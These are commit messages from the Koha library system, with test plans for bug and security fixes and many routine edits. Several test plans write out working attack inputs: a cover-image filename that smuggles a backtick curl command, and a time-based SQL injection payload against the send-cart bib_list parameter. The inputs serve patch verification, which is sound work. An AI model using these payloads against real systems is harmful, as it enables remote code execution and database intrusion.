Test plan:
Try to access opac-page.pl with a language not in OPACLanguages.
Verify that this 'language' was not passed to sql. Simplest perhaps
by debugging AdditionalContent.pm. Something like:
sub translated_content {
my ( $self, $lang ) = @_;
+warn "L137: $lang";
Now have a public additional_contents page and hit it:
/cgi-bin/koha/opac-page.pl?page_id=5&language=badsql
Check your log and find:
[2024/05/16 07:25:53] [WARN] L137: en at [etc] line 137.
So badsql was caught.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
To test:
1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip'
Where the domain is one you can watch the logs from
2/ Upload this file as a cover image
3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames
4/ Choose process, check the logs of the webserver see the connection has been made
5/ Apply the patch
5/ Repeat 2 & 3 and see the filename is now escaped
6/ Choose process and check no errors but no no remote execution occurs
7/ Test uploading actual zip file and images still works
Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+- to the bib_list parameter
7/ Run the curl notice it takes a long time to respond, if you want to check run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice no longer the slow down
10/ Test in browser and make sure the basket is still sent
Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Actually in _get_tt_params
The following query will delay the response
SELECT `me`.`biblionumber`, `me`.`frameworkcode`, `me`.`author`, `me`.`title`, `me`.`medium`, `me`.`subtitle`, `me`.`part_number`, `me`.`part_name`, `me`.`unititle`, `me`.`notes`, `me`.`serial`, `me`.`seriestitle`
, `me`.`copyrightdate`, `me`.`timestamp`, `me`.`datecreated`, `me`.`abstract`
FROM `biblio` `me`
WHERE `biblionumber` = '1) AND (SELECT 1 FROM (SELECT(SLEEP(6)))x)-- -'
ORDER BY field( biblionumber, 1 ) AND (
SELECT 1
FROM
SELECT SLEEP( 6 ) x
) -- - )
To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+- to the bib_list parameter
7/ Run the curl notice it takes a long time to respond, if you want to check run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice no longer the slow down
10/ Test in browser and make sure the basket is still sent
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This patch refactors checkpw_internal to remove the SQL code, use patron ojbects, and return the
patron that correctly matches the userid/caerdnumber when auth is successful
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This patch moves some patron fetching code in C4/Auth to use to patron returned from the validation
methods and only try to fetch the patron (to check if locked, update attempts, etc) if we didn't authenticate
To test:
1 - Set a user to have userid = BANANA password = Password1
2 - Set a user to have cardnumber = BANANA password = Password2
3 - Hit the patron authentication API:
http://localhost:8080/api/v1/auth/password/validation
with data:
{ "identifier": "BANANA", "password":"Password1" }
and:
{ "identifier": "BANANA", "password":"Password2" }
4 - Note you receive the same response for both
5 - Apply patch, restart all
6 - Repeat the API and confirm you get the correct patron for the password submitted
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This test is useless it seems, it is not testing background jobs
behaviour.
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We usually test if C4::Context->userenv, so we need to undef when
unsetting, not {} (evaluated true)
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Same pattern in Koha::Database
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Same pattern, remove dbh stack
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We are not using it and it's confusing, let's remove the context stack.
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
TODO - better review C4::Auth's changes. Are all the removal of
_new_userenv correct/enough?
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
To test;
1. Go to circ/circulation.pl and check an item out to a patron.
2. Backdate it to sometime in the past using the "Specify due date
(MM/DD/YYYY) : " input
3. A modal appears to "Please confirm checkout". The date is no longer
populated in that field.
4. You must add the date again here.
5. APPLY PATCH
6. Try again and this time the confimration date should be set
correctly.
7. Follow the test plan from Bug 18885 to make sure on site checkouts
still work correctly.
Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We're copying permissions not settings here, so it makes sense to make
that clear in the wording.
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch moves the 'PlaceHoldsOnOrdersFromSuggestions' system preferences
from the Acquisitions->Printing section to the Circulation->Holds Policy section.
To test:
1) Go to Admin->System Preferences and search for 'PlaceHoldsOnOrdersFromSuggestions'
2) Note that it is located in the Acquisitions prefs, under the Printing subheading
3) Apply patch
4) search for the preferences again
5) Note that it is now located in the Circulation preferences under the Holds Policy subheading
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch updates the comments of course_items.location and
course_items.enabled to say "reserve" instead of "reseve".
To test in ktd:
- sudo koha-mysql kohadev
- Run: "SHOW CREATE TABLE course_items;"
- Verify the comments of "location" and "enabled" contains
"reseve" instead of "reserve"
- Make a note of the definitions of these two columns
- Run the atomicupdate: "sudo koha-upgrade-schema kohadev"
- Log into the database again and run the same command as above
- Verify the comments now say "reserve" instead of "reseve"
- Make sure the column definitions are otherwise identical to
the ones you saw before the upgrade. Only the spelling of
"reserve" in the comment should be changed.
Signed-off-by: David Nind <david@davidnind.com>
Removed unnecessary line of debug output. 2024-06-10 Magnus Enger
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Test plan:
1. git grep 'reseve'. Notice there are instances of 'reseve'
2. Apply patch
3. Repeat step 1, there should be no instances of 'reseve'
Sponsored-by: Catalyst IT, New Zealand
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Test plan:
1. git grep -n -E 'barocode|preproccess' to find the files and line # of typos
2. Apply the patch
3. git grep -E 'barocode|proccess'
4. See no results
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This makes the hint when entering an SMS number on the OPAC messaging
settings page the same as the staff interface hint: "Please enter
numbers only. Prefix the number with + or 00 if including the country
code." For some countries using either +XX or 00XX are accepted,
for example: +49 or 0049.
Test plan:
1. Set the SMSSendDriver system preference to Email
2. View the current hint for entering an SMS number in the staff
interface:
2.1 Go to Patrons > + New patron > Patron.
2.2 Scroll down to the 'Patron messaging preferences' section at the
end of the page.
2.3 Note that the hint is "Please enter numbers only. Prefix the
number with + or 00 if including the country code.".
3. View the current hint for entering an SMS number in the OPAC:
3.1 Go to the OPAC > Your account (log in if required).
3.2 Select the 'Messaging' tab/section.
3.3 Note that the hint is "Please enter numbers only. Prefix the
number with + if including the country code.".
3.4 The difference: "..or 00.." is missing.
4. Apply the patch.
5. Refresh the OPAC messaging page.
6. The hint text for the OPAC is now the same as the staff interface.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Sam Lau <samalau@gmail.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
The date field for patron attributes is now repeatable (enhancement made
in Koha 24.05 with bug 32610). This updates the hint text to reflect
the change.
Test plan:
1. Go to add a patron attribute (Administration > Patrons and
circulation > Patron attribute types > + New patron attribute type )
2. Note that the hint for the "Is a date" field says "...Date attributes
cannot be repeatable or linked to an authorised value category.".
3. Apply the patch.
4. Reload the page.
5. Note that the hint now says "...Date attributes are repeatable,
but cannot be linked to an authorised value category."
6. Sign off D:
PA amended: 'are repeatable' -> 'can be repeatable'
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Update the error message for the web installer onboarding
section when creating the Koha administrator patron (where
the card number or username already exists):
- Fix capitalization
- Use the same label in the error message as used in
the form
Error message before: The patron has not been created!
Card number or Userid may already exist.
Error message after: The patron was not created! The
card number or username already exists.
Test plan:
1. Option 1:
1.1 Review the diff for the patch and make sure that
the updated text makes sense.
. Previous text: The patron has not been created!
Card number or Userid may already exist.
. Updated text: The patron was not created! The
card number or username already exists.
OR
2. Option 2:
2.1 Access the database server:
mysql -uroot -ppassword -hkoha-db-1
2.2 Drop the koha_kohadev database:
drop database koha_kohadev;
2.3 Create the database: create database koha_kohadev;
2.4 Add privileges (for a real installation this would
be limited):
grant all on koha_kohadev.* to koha_kohadev;
2.5 Restart everything (there may be some errors listed):
flush_memcached and then restart_all
2.6 Access the web installer: go to 127.0.0.1:8081
2.7 Use the database user name and password: get from
/etc/koha/sites/kohadev/koha-conf.xml
(default: koha_kohadev, password)
2.8 Continue through the installation process until you
reach 'Selecting default settings':
. Make appropriate selections to use all the sample
data options and settings
2.9 For the 'Onboarding' step - Create Koha
administrator patron:
. Surname: Acevedo
. First name: Henry
. Card number: make up a number that doesn't exist in
the sample date, for example: 741852963
. Library: Centerville
. Patron category: Staff
. Username: 23529000035676 (this is an existing
value already in the sample data)
. Password: a valid password, for example:
KohaCon2024
. Confirm password: repeat password used
. Submit
==> Error message before patch: The patron has not
been created! Card number or Userid may
already exist.
2.10 Apply the patch.
2.11 Repeat step 2.9
2.12 The error message is now: The patron was not created!
The card number or username already exists.
3. Sign off.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
In the Item search the librarian is allowed, in the first step, to define
additional filters like Title, Author, Publisher, Publication date etc.
(in the third fieldset). This works fine but only for one criterion.
If one adds two or more criteria, the filter does not apply at all.
Test plan
=========
1. Make an Item search with the Pulblisher filter. Put
%University of California% as the value.
You should get 5 rows (with standard ktd test data set), three
from 1982, and two from 1988.
2. Edit search -> add the second criterion: AND Publication date is 1982.
You would expect three rows but you get 900+ rows.
3. Apply the patch; restart_all.
4. Repeat p. 2. You should get the expected three rows.
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Fix a spelling error in the opacreadinghistory system preference
description - 'itms' to 'items'.
Test plan:
1. In the staff interface view the description for the
opacreadinghistory system preferences (Koha administration >
System preferences > search for opacreadinghistory).
2. Note that it reads "Allow patrons to see what itms they have
checked out in the past."
3. Apply the patch.
4. Refresh the page.
5. Note that 'itms' is now spelt correctly as 'items'.
6. Sign off.
Signed-off-by: Laura Escamilla <laura.escamilla@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
If you enabled AutoLocation and have a branch without ip, this
triggers warnings.
Test plan:
Check logs in this situation with/without this patch by logging out
and in again on staff.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch updates the vendor details template so that the title tag
correctly reflects whether the user is viewing the vendor or modifying
it.
To test, apply the patch and go to Acquisitions.
- Locate a vendor and view the details (supplier.pl?booksellerid=X)
- The title should read "Vendor X > Acquisitions > Koha"
- Edit the vendor.
- The title should read "Modify vendor X > Acquisitions > Koha"
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
--category-code was not checked in the "at least one filter option"
check but it is clearly a filter option.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
* Change the SYNOPSIS to better describe the different ways to use the
script
* Only show the SYNOPSIS when options used are wrong (unknown option,
no filter options, or neither -c nor -v)
* Show the options details only with --help
* Clarify the fact that -v is required when -c is not supplied in the
description of both options
* Print a specific error message for the following cases:
* no filters options
* neither -c nor -v was supplied
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch fixes a warning in the unit tests
Test plan:
1) prove t/db_dependent/api/v1/password_validation.t
2) There will be a warning in the output - 'Use of uninitialized value $status in numeric eq (==)'
3) Apply patch
4) Re-run the test
5) The warning will disappear
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Some actions such as archiving a suggestion were not being logged.
By moving the logging to Koha::Suggestion we can ensure more
modifcations will be logged.
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
